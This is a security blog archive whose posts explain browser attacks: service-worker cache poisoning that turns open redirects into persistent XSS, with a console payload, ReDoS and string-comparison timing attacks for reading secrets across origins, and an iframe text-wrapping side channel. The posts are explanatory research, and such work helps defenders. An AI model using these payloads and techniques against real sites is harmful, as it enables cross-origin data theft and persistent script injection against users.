Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:

When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
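The three steps above can be sketched roughly as follows. This is a minimal sketch and not the demo's actual source: `buildPoisonUrl`, `poisonCache` and the `https://attacker.example` host are hypothetical names, and only the paths `/sw.js`, `/cgi-bin/redirect?continue=` and `/cgi-bin/attack` come from the lists above. It also assumes the worker takes control of the page before the image loads.

```javascript
// Build the open-redirect URL that bounces to the attacker's CORS-enabled page.
// `attackUrl` is a placeholder; the real demo's host is not shown in this post.
function buildPoisonUrl(attackUrl) {
  return '/cgi-bin/redirect?continue=' + encodeURIComponent(attackUrl);
}

// Browser-only part: install the service worker, then request the redirect
// through an <img crossorigin="anonymous"> so the fetch is made with mode=cors.
function poisonCache(attackUrl) {
  return navigator.serviceWorker.register('/sw.js').then(function () {
    var img = document.createElement('img');
    img.crossOrigin = 'anonymous';
    img.src = buildPoisonUrl(attackUrl);
    document.body.appendChild(img);
  });
}

// Only run the browser part where the APIs exist.
if (typeof navigator !== 'undefined' && navigator.serviceWorker &&
    typeof document !== 'undefined') {
  poisonCache('https://attacker.example/cgi-bin/attack');
}
```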
If all went well, the page above should be "poisoned", and forever (or until the SW updates its cache) you will get the XSS payload. Try it, but note that you must first have "poisoned" the response above: if you click the button below before poisoning the cache, you will ruin the demo forever, since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, clear the cache and try again.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++

Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post repeating the presentation in written form. However, I was hoping to watch the video first to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. So, until then, today's post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! Its APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps, as no requests are actually made). You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

This content wasn't part of the presentation because I thought the talk already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction), or you can read this article or watch this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, which is probably kind-of bad, is the possibility of turning a reflected XSS into a persistent XSS. We've already seen this type of problem with APIs like localStorage before, but what makes this different is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cached response (the logic is entirely up to the Service Worker). One of the main use-cases for service workers is to serve a cached copy of the response. This cache is programmatic and it is totally up to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache if available, or to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever they want, and let the client serve the malicious XSS forever!
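To make the pattern concrete, here is a minimal sketch of a cache-first handler. It is not taken from any of the samples: `cacheFirst` and the cache name `example-cache-v1` are made up for illustration, and the cache and fetch function are passed in as parameters only so the logic can be exercised outside a worker.

```javascript
// Cache-first lookup: serve from the cache when possible, otherwise fetch and
// store the response. `cache` needs match()/put() and `fetchFn` behaves like
// fetch(); both are passed in so the logic can be exercised outside a worker.
function cacheFirst(request, cache, fetchFn) {
  return cache.match(request).then(function (cached) {
    if (cached) {
      return cached; // the server is never contacted for this request
    }
    return fetchFn(request).then(function (response) {
      // Real Response objects are single-use streams, so store a clone.
      var copy = typeof response.clone === 'function' ? response.clone() : response;
      return cache.put(request, copy).then(function () {
        return response;
      });
    });
  });
}

// Wiring inside a service worker; the cache name is a made-up example.
if (typeof ServiceWorkerGlobalScope !== 'undefined') {
  self.addEventListener('fetch', function (event) {
    event.respondWith(
      caches.open('example-cache-v1').then(function (cache) {
        return cacheFirst(event.request, cache, fetch);
      })
    );
  });
}
```

Note that nothing here looks at what is being served: whatever sits in the cache under that request wins, which is exactly what makes a polluted entry so sticky.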

If you want to try this out, go here:

Then fake an XSS by typing this into the console:

caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll often see in new Service Worker enabled applications. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request's, then simply don't use the response, and discard it from the cache. This idea is quite important actually, and I'll explain why below.
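A minimal sketch of that check could look like the following. The helper names (`sameUrlIgnoringFragment`, `responseMatchesRequest`, `safeMatch`) are hypothetical, and treating an empty `response.url` as untrusted is an assumption of this sketch rather than something the original idea spells out.

```javascript
// Compare two absolute URLs while ignoring any #fragment.
function sameUrlIgnoringFragment(a, b) {
  var ua = new URL(a);
  var ub = new URL(b);
  ua.hash = '';
  ub.hash = '';
  return ua.href === ub.href;
}

// True only when the response really came from the URL that was requested.
// An empty response.url (opaque or script-constructed responses) is rejected.
function responseMatchesRequest(request, response) {
  if (!response || !response.url) {
    return false;
  }
  return sameUrlIgnoringFragment(request.url, response.url);
}

// Cache lookup that discards mismatching entries instead of serving them.
function safeMatch(request, cache) {
  return cache.match(request).then(function (cached) {
    if (!cached) return undefined;
    if (responseMatchesRequest(request, cached)) return cached;
    return cache.delete(request).then(function () { return undefined; });
  });
}
```

One trade-off of a check this strict is that it also rejects responses that arrived through a legitimate redirect, so an application that relies on redirects would need to handle those separately.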

When Secure Open Redirects become XSS

A couple of years ago, in a presentation with thornmaker, we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and specifically some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
And you have a service worker like this one:
What that service worker does, like the previous one, is simply cache every request that goes through it by refetching it. When the refetched URL is the open redirect, the fetch follows the redirect and the service worker caches the response from the redirect target as the response for the original request!

That means that the next time the user goes to the open redirect URL, the request will be served from the cache and, instead of getting a 302 redirect, they will get the contents of the attacker's page.

Note that for this to work, the attacker's page must include Access-Control-Allow-Origin: * as a response header, as otherwise the response won't be accepted. The request also needs to be made in CORS mode (with a cross-origin image or an embed request, for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that, because Service Workers will now be kind-of like web servers but without any APIs for secure web development, it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs

For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). These range from RegExp bugs (because the JS APIs aren't secure by default) to things like the JSON API's lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).
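As a rough illustration of the difference, here is a sketch of string concatenation with and without escaping. The function names are made up, and `escapeHtml` only covers HTML text and quoted attribute values; it is nowhere near the strict contextual auto-escaping mentioned above.

```javascript
// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Unsafe: untrusted input is concatenated straight into markup.
function greetingUnsafe(name) {
  return '<p>Hello ' + name + '</p>';
}

// Safer for this one context (element text): escape before concatenating.
function greetingEscaped(name) {
  return '<p>Hello ' + escapeHtml(name) + '</p>';
}
```

A service worker that builds a `new Response(...)` from something like `greetingUnsafe(userInput)` reflects the payload as-is, while the escaped variant renders it as inert text.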

It's also worth noting that the asynchronous nature of Service Workers (event-driven and promise-based), mixed with developers who aren't used to it, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope. That isn't the case today, but it is very likely to be the case soon.

Cross Site Request Forgery

Another concern is that CSRF protection will have to behave differently for Service Workers. Specifically, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and of itself, but mixing this with online web applications will most likely pose a challenge. Funnily, none of the demos I found online have CSRF protection, which underscores the problem, but also makes it hard for me to give you examples of why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.


I'm really excited to see what type of web applications are developed with Service Workers, and also what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models in developers' heads.

Another thing I wanted to mention before closing up is that I'll start experimenting with writing some of the defensive security tools I mentioned in the talk. If you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is web application timing attacks: a couple of techniques for attacking another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services or local applications. Recently, they've also been used to attack browser security features.

What I want to discuss today is not attacking the browser, or the operating system, but rather other websites. Specifically, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.

The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..

Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.

We know that you can obviously tell whether your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that one origin can't interact with another. It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    // e.data is the regular expression supplied by the other page
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.origin);
    }
};

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9

You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    // the reply no longer says whether there was a match
    e.source.postMessage('finished', e.origin);
};

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:

  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX

Did you notice that the right answer took longer than the others?
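The effect can be reproduced locally without any frames. The sketch below is only an illustration: the page content and the helper names (`now`, `timeRegex`, `redosProbe`) are made up, and only the backtracking-heavy suffix is taken from the list above. Neither probe matches, so the only signal left is how long the search took.

```javascript
// Millisecond clock; performance.now() has sub-millisecond resolution where available.
function now() {
  return typeof performance !== 'undefined' ? performance.now() : Date.now();
}

// Time a single RegExp search over `haystack`, in milliseconds.
function timeRegex(pattern, haystack) {
  var re = new RegExp(pattern);
  var start = now();
  var matched = re.test(haystack);
  return { matched: matched, elapsedMs: now() - start };
}

// Append the backtracking-heavy suffix from the list above to a guessed prefix.
function redosProbe(guess) {
  return guess + '[0-9.]+(.{0,100}){12}XXX';
}

// Made-up page content; in the real attack this lives in the victim's frame.
var page = 'The secret is 0.4729103856214';

var wrong = timeRegex(redosProbe('The secret is 0.1'), page);
var right = timeRegex(redosProbe('The secret is 0.4'), page);
console.log('wrong guess:', wrong.elapsedMs, 'ms');
console.log('right guess:', right.elapsedMs, 'ms');
```

A wrong prefix fails on the first few characters, while a right prefix forces the engine to try every way of splitting the remaining digits across the twelve groups before giving up on `XXX`.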

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
};

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates one origin from another, I wasn't being totally honest. The JavaScript code from both origins runs in the same thread. That is, if you have 3 iframes, each pointing to a different origin, then all of them run in the same thread.

Said another way, if one of them suddenly decides to run into an infinite loop, neither of the other two will be able to run any JavaScript code. Don't believe me? Give it a try!


Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because the snakes, the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens up to us. We don't need the other page to surrender any information to us. Simply because it runs in the same thread we do, we can guess how long its code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.
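Here is a minimal sketch of that idea. The names `findStalls` and `recordTicks`, and the `slackMs` tolerance, are made up for illustration. Browsers also clamp repeating timers, so "every millisecond" is only approximate in practice and the period should be treated as a best effort.

```javascript
// Given timestamps (ms) of ticks that were scheduled roughly every `periodMs`,
// report gaps far longer than the period: the shared thread was busy then.
function findStalls(timestamps, periodMs, slackMs) {
  var stalls = [];
  for (var i = 1; i < timestamps.length; i++) {
    var gap = timestamps[i] - timestamps[i - 1];
    if (gap > periodMs + slackMs) {
      stalls.push({ at: timestamps[i - 1], blockedMs: gap - periodMs });
    }
  }
  return stalls;
}

// Collect tick timestamps for `durationMs`, then hand them to `done`.
function recordTicks(durationMs, periodMs, done) {
  var ticks = [];
  var begin = Date.now();
  var timer = setInterval(function () {
    ticks.push(Date.now());
    if (Date.now() - begin >= durationMs) {
      clearInterval(timer);
      done(ticks);
    }
  }, periodMs);
}
```

In the attacking page one would start `recordTicks`, trigger the victim's code (for example with a postMessage), and then feed the collected timestamps to `findStalls` to estimate how long the victim kept the thread busy.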

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, serializes its text contents, and then searches for such value inside it. In a nutshell it does:


Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:

But again, this is even more difficult than the indexOf() attack we were discussing earlier.. The question now is: can we detect string comparisons? Can we get enough accuracy to know whether a string comparison succeeded?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
These strange-looking results mean, mostly, that comparing two equal, very long strings takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is, first, try to take a shortcut. If the lengths are different, they return false immediately. If the lengths are the same, on the other hand, they compare char-by-char. As soon as they find a character that doesn't match, they return false.
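The behaviour just described can be modelled in a few lines. This is an illustrative model only, not how any particular engine is implemented (real engines may have further shortcuts), and `modelEquals` is a made-up name. It returns the result together with the number of character comparisons it needed, which is the quantity the timing attack tries to observe.

```javascript
// Illustrative model only, not an engine's real implementation: returns the
// result of the comparison plus how many character comparisons were needed.
function modelEquals(a, b) {
  if (a.length !== b.length) {
    return { equal: false, charsCompared: 0 }; // length shortcut
  }
  for (var i = 0; i < a.length; i++) {
    if (a.charCodeAt(i) !== b.charCodeAt(i)) {
      return { equal: false, charsCompared: i + 1 }; // first mismatch
    }
  }
  return { equal: true, charsCompared: a.length };
}
```

In this model `modelEquals('wrong', 'right')` stops after one character, while `modelEquals('right', 'right')` has to look at all five, and a guess with a correct prefix lands somewhere in between.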

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is, 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" is stable, with the latter being 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out of the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples, we can either average the results, or get the mean of means (which needs a lot of samples), or use a chi-squared test if we know the variance, or a Student's t-test if we can assume a normal distribution (JavaScript's garbage collector skews things a bit).
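As one simple way to summarize noisy samples, here is a sketch that ranks candidate guesses by their median time. To be clear, this is not the test I ended up using (that one isn't described here); the median is swapped in because it is less sensitive to the occasional garbage collection pause than a plain average, and `median` and `rankBySlowestMedian` are made-up names.

```javascript
// Median of a list of numbers; less sensitive to GC pauses than the mean.
function median(values) {
  var sorted = values.slice().sort(function (x, y) { return x - y; });
  var mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// `samples` maps each guessed value to an array of measured times (ms).
// Returns the guesses ordered from slowest to fastest median.
function rankBySlowestMedian(samples) {
  return Object.keys(samples)
    .map(function (guess) { return { guess: guess, median: median(samples[guess]) }; })
    .sort(function (p, q) { return q.median - p.median; });
}
```

For example, with `{ '0': [10, 11, 10, 95], '1': [12, 13, 12, 12], '2': [10, 10, 11, 10] }` the single 95 ms outlier would make guess `'0'` look slowest on average, while the median ranking puts `'1'` first.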

At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different from the numbers because here we have a 37-character alphabet, while with numbers it's just 10.
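As a quick sanity check of the "5 quadrillion" figure in the first bullet: exhausting every 18-digit value within the quoted 3 minutes requires the rate computed below. The variable names are made up, and the sketch only covers the brute-force side of the comparison.

```javascript
// Rate needed to exhaust every 18-digit value within the 3 minutes quoted above.
var candidates = Math.pow(10, 18);
var seconds = 3 * 60;
var bruteForceRate = candidates / seconds;
console.log(bruteForceRate.toExponential(2) + ' comparisons per second');
```

That comes out at roughly 5.6 × 10^15 comparisons per second, which is where the quadrillions come from.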
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this, which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with fewer iterations and more samples, faster machines run best with more iterations and fewer samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadedness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for an 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing relies on the fact that strings from different origins are stored in the same hash table. This means that if we were able to distinguish a hashtable miss from a hashtable hit, we could read strings cross-origin.

I spent a lot of time trying to make that work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!

Sunday, September 22, 2013

[Matryoshka] - Wrapping Overflow Leak on Frames

I just came back from a very fun trip around Europe. Among other places, I visited Hamburg, to attend HackPra 2013, which was hosted in AppSec Europe. In there I gave the presentation Matryoshka - titled after the famous Russian dolls.

Today I'm blogging about one of the subjects of that presentation, an information leak introduced by a "side channel" present in iframes. I didn't give much detail in the presentation since I was afraid I was gonna run out of time (this was just one part of the presentation). This blogpost is meant to add more detail, as well as give a couple more details I wasn't sure worked at the time of the presentation.

A quick summary of the problem is that, under certain circumstances, it is possible to know when text inside an iframe wraps to the next line. Text wrapping is when a line is longer than the width of the area it can be displayed into, so it needs to wrap to a second line.

Being able to detect text wrapping is an interesting problem, as it allows us to learn some information about the framed website, which might be particularly dangerous under some circumstances.

To show a small example, the following iframe is hosted in a different domain than this blog post:

We are not allowed to know what the contents are because of the Same Origin Policy. It's important to understand this: we can iframe anything, including third party sites to which you are authenticated. This might include sites that contain secret information, like your email inbox, or your bank statements.

Now, let's see what we can do:

  • We can change the width and height of this iframe at will.
  • We can navigate the inner iframes from that page.
  • We can change the style of your scrollbars or detect their presence.
To clarify, changing the width and height of the iframe will allow us to force some content to wrap on to the next line. To exploit this we need to know whether the content wrapped or not.

Navigating Child Iframes

By navigating child iframes, we can change an otherwise innocuous iframe (such as a Facebook like button), to a domain we control. We can do this by design, even on cross-domain iframes, look:

This works because the window.frames[] property is exposed cross-origin, and the Same Origin Policy allows navigating child frames, even those that are cross-domain.

The reason this matters, is because once we control a child iframe in our target page, we can know the position of the iframe relative to the browser/screen. This will let us know if the content of the page wrapped, as we'll discuss later on.

Detecting when the text wraps to the next line is the cornerstone of this attack.

Detecting Iframe Screen Coordinates

In Trident and Gecko based browsers, it is possible to detect the position of an iframe relative to the screen. This is interesting, as it allows us to know exactly when an iframe moves down because of text wrapping.

We detect this with one of two properties, either window.screenTop for Trident based browsers, or window.mozInnerScreenY for Gecko based browsers (and mouse events in general). These properties are only readable from within the target iframe, but as we explained before, it is perfectly possible to navigate our target site's child iframes. Once we do that, we can reduce the width of our iframe until the text no longer fits on one line and the rest of it moves to the next line, displacing our iframe.

Please note this proof of concept doesn't work in all browsers (notably, it only works in Firefox/IE), so it might not work for you, but feel free to give it a try.

Detecting Scrollbars Presence

This is interesting: in some browsers, it is possible to apply CSS to the scrollbars of the iframe. This is important because, if the scrollbar style contains a background-image, the image is only requested when the scrollbar is shown, which leaks whether the text wrapped. In some browsers you need to change the backgroundImage after the creation of the iframe for the image to be requested.

Please note this proof of concept doesn't work in all browsers (notably, this only works in WebKit-based browsers), so it might not work for you, but feel free to give it a try.

What will happen when you click that button is:
  • The width of the iframe will be slowly reduced pixel by pixel.
  • When the word "dusk" wraps to the next line, it will display the vertical scrollbar.
  • When the vertical scrollbar is shown, the background image will be requested.
  • We detect when such requests happen by checking document.cookie.

Measuring Word Width

So far we have found a way to tell when text wraps to the next line, either by detecting the presence of a scrollbar, or by navigating a child iframe and detecting its position relative to the screen.

To measure a specific word width, we will follow the following steps:
  1. Resize the target iframe to:
    • width: 9999999px
    • height: smallest-without-scrollbar;
  2. Slowly reduce the width until the text wraps. (You can reduce in fraction of pixels).
    • If you are detecting a scrollbar, ensure to increase the height to make the scrollbar disappear.
    • If you are detecting text wrapped from a child iframe, detect changes from the new current position.
  3. Repeat
    • Record the exact width at which text wrapping happened.
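The "slowly reduce the width" step can be sped up with a bisection, assuming wrapping is monotonic in the width (once a line wraps, it keeps wrapping at any narrower width). This is a sketch of that swapped-in technique rather than the code used in the proof of concept; `findWrapWidth` is a made-up name, and `wrapsAt` stands in for whatever detection is available (scrollbar presence or child iframe position).

```javascript
// Find the width at which wrapping starts, to within `epsilon` pixels.
// `wrapsAt(width)` must return true when the text wraps at that width and is
// assumed to be monotonic: once it wraps, every narrower width wraps too.
function findWrapWidth(wrapsAt, narrow, wide, epsilon) {
  // Invariant: wrapsAt(narrow) is true and wrapsAt(wide) is false.
  while (wide - narrow > epsilon) {
    var mid = (narrow + wide) / 2;
    if (wrapsAt(mid)) {
      narrow = mid;
    } else {
      wide = mid;
    }
  }
  return wide; // smallest width known not to wrap
}
```

With a stand-in predicate such as `function (w) { return w < 123.456; }` and the starting range `0` to `9999999`, the result converges on the width of the line to within the requested `epsilon`.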
We will actually learn things in a bit of an odd order. For this particular example, we will get the length of the following:
  • First wrapping:       hello, my name is bond, james bond.
  • Second wrapping:   the secret is on the island!
  • Third wrapping:      bond, james bond.
  • Fourth wrapping:    name is bond,
  • Fifth wrapping:       bond, james
  • Sixth wrapping:      the secret
  • Seventh wrapping:  my name
  • Eighth wrapping:    secret is
  • Ninth wrapping:      name is
  • Tenth wrapping:      is on
The exact fraction of a pixel at which the line wraps (which in practice I've seen sometimes needs to be as accurate as 1E-10 pixels) tells us the length of the line.

By calculating the difference between different lines, we can also get the length of other sequences of words:
  1. hello, my name is
  2. hello, my james bond.
  3. hello, my name is bond.
  4. hello, is bond, james bond.
  5. hello, my bond, james bond.
  6. ...
And we can also get "bond" by subtracting (1) from (3). We can also get "james" by subtracting (3) from the first wrapping, etc. We might not always get the length of a specific word, but rather of groups of two words, but the attack works in both cases.
